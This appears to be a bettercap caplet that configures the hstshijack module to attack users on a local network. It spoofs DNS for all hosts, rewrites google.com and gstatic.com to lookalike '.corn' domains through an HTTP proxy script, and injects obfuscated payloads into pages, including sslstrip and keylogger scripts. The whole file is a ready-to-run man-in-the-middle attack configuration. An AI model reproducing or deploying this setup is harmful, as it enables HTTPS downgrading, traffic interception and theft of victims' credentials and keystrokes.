# Documentation can be found at https://github.com/yaswanthswarna444-prog/caplets/tree/master/hstshijack

# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads'
# variables get precendence over those assigned to the 'hstshijack.ignore' variable.
set hstshijack.targets         google.com, *.google.com, gstatic.com, *.gstatic.com
set hstshijack.replacements    google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
set hstshijack.ssl.domains     ./domains.txt
set hstshijack.ssl.index       ./index.json
set hstshijack.ssl.check       true
#set hstshijack.blockscripts    example.com,*.example.com
set hstshijack.obfuscate       true
set hstshijack.payloads        *:./payloads/hijack.js,*:./payloads/sslstrip.js,*:./payloads/keylogger.js,*.google.com:./payloads/google-search.js,google.com:./payloads/google-search.js
set hstshijack.whitelist       ./whitelist.json
set hstshijack.ignore          captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com

net.recon on

set http.proxy.script  ./hstshijack.js
http.proxy on

set dns.spoof.domains  google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
set dns.spoof.all      true
dns.spoof on

